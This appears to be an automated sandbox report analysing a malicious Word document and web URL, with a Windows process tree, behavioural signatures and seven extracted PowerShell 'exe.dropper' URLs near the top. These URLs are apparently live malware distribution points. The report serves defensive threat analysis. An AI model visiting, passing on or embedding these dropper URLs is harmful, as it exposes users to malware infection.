Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    21-01-2021 15:47

General

  • Target

    http://www.serviciomore.com/Sistema/XUL2/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://trendmoversdubai.com/cgi-bin/B73/

exe.dropper

http://dryaquelingrdo.com/wp-content/SI/

exe.dropper

http://bardiastore.com/wp-admin/A1283/

exe.dropper

http://oxycode.net/wp-admin/x/

exe.dropper

http://fabulousstylz.net/248152296/TpI/

exe.dropper

http://abdo-alyemeni.com/wp-admin/seG6/

exe.dropper

http://giteslacolombiere.com/wp-admin/FV/

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of SetWindowsHookEx 27 IoCs
  • Suspicious use of WriteProcessMemory 2331 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.serviciomore.com/Sistema/XUL2/
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff877096e00,0x7ff877096e10,0x7ff877096e20
      2⤵
        PID:4792
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1496 /prefetch:2
        2⤵
          PID:2148
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1624 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3516
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
          2⤵
            PID:4240
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:1
            2⤵
              PID:3196
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
              2⤵
                PID:4072
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                2⤵
                  PID:3508
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
                  2⤵
                    PID:2788
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
                    2⤵
                      PID:1864
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4104 /prefetch:8
                      2⤵
                        PID:4488
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4268 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4476
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:8
                        2⤵
                          PID:4652
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:8
                          2⤵
                            PID:2536
                          • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                            "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
                            2⤵
                              PID:188
                              • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff768157740,0x7ff768157750,0x7ff768157760
                                3⤵
                                  PID:1020
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4540 /prefetch:8
                                2⤵
                                  PID:4396
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5200 /prefetch:8
                                  2⤵
                                    PID:4640
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5496 /prefetch:8
                                    2⤵
                                      PID:4572
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5192 /prefetch:8
                                      2⤵
                                        PID:748
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
                                        2⤵
                                          PID:848
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5288 /prefetch:8
                                          2⤵
                                            PID:4476
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5804 /prefetch:8
                                            2⤵
                                              PID:1688
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6424 /prefetch:8
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4676
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:8
                                              2⤵
                                                PID:2292
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
                                                2⤵
                                                  PID:2024
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5136 /prefetch:8
                                                  2⤵
                                                    PID:4260
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6236 /prefetch:8
                                                    2⤵
                                                      PID:2944
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5168 /prefetch:8
                                                      2⤵
                                                        PID:4636
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5144 /prefetch:8
                                                        2⤵
                                                          PID:4436
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
                                                          2⤵
                                                            PID:4644
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
                                                            2⤵
                                                              PID:4788
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:8
                                                              2⤵
                                                                PID:1440
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:8
                                                                2⤵
                                                                  PID:4912
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:8
                                                                  2⤵
                                                                    PID:5112
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6472 /prefetch:8
                                                                    2⤵
                                                                      PID:560
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
                                                                      2⤵
                                                                        PID:4552
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6848 /prefetch:8
                                                                        2⤵
                                                                          PID:4532
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6844 /prefetch:8
                                                                          2⤵
                                                                            PID:2276
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:8
                                                                            2⤵
                                                                              PID:2512
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:8
                                                                              2⤵
                                                                                PID:1548
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7380 /prefetch:8
                                                                                2⤵
                                                                                  PID:2936
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7376 /prefetch:8
                                                                                  2⤵
                                                                                    PID:3988
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7644 /prefetch:8
                                                                                    2⤵
                                                                                      PID:3972
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7804 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4056
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7952 /prefetch:1
                                                                                        2⤵
                                                                                          PID:1264
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8092 /prefetch:8
                                                                                          2⤵
                                                                                            PID:1472
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8088 /prefetch:8
                                                                                            2⤵
                                                                                              PID:2532
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8480 /prefetch:8
                                                                                              2⤵
                                                                                                PID:3968
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8624 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:196
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8744 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:2516
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8460 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4468
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8616 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4760
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9184 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4484
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9328 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:1260
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:5464
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1564 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:3200
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:2108
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=980 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:5060
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:5704
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8332 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:3624
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1456,12510126873735507847,17184059777075624556,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=980 /prefetch:2
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4092
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                1⤵
                                                                                                                  PID:5532
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                    2⤵
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Modifies registry class
                                                                                                                    • NTFS ADS
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:5592
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5592.0.209139186\1950035964" -parentBuildID 20200403170909 -prefsHandle 1528 -prefMapHandle 1520 -prefsLen 1 -prefMapSize 219511 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5592 "\\.\pipe\gecko-crash-server-pipe.5592" 1608 gpu
                                                                                                                      3⤵
                                                                                                                        PID:5736
                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5592.3.868953506\1136503695" -childID 1 -isForBrowser -prefsHandle 2248 -prefMapHandle 2244 -prefsLen 156 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5592 "\\.\pipe\gecko-crash-server-pipe.5592" 2256 tab
                                                                                                                        3⤵
                                                                                                                          PID:5840
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5592.13.1299762970\1154413051" -childID 2 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 7013 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5592 "\\.\pipe\gecko-crash-server-pipe.5592" 3428 tab
                                                                                                                          3⤵
                                                                                                                            PID:6032
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5592.20.2127164518\1314309978" -childID 3 -isForBrowser -prefsHandle 4336 -prefMapHandle 4448 -prefsLen 8126 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5592 "\\.\pipe\gecko-crash-server-pipe.5592" 3948 tab
                                                                                                                            3⤵
                                                                                                                              PID:5352
                                                                                                                        • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                          "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\L4VEFCDESA5DE6B.doc" /o ""
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:1268
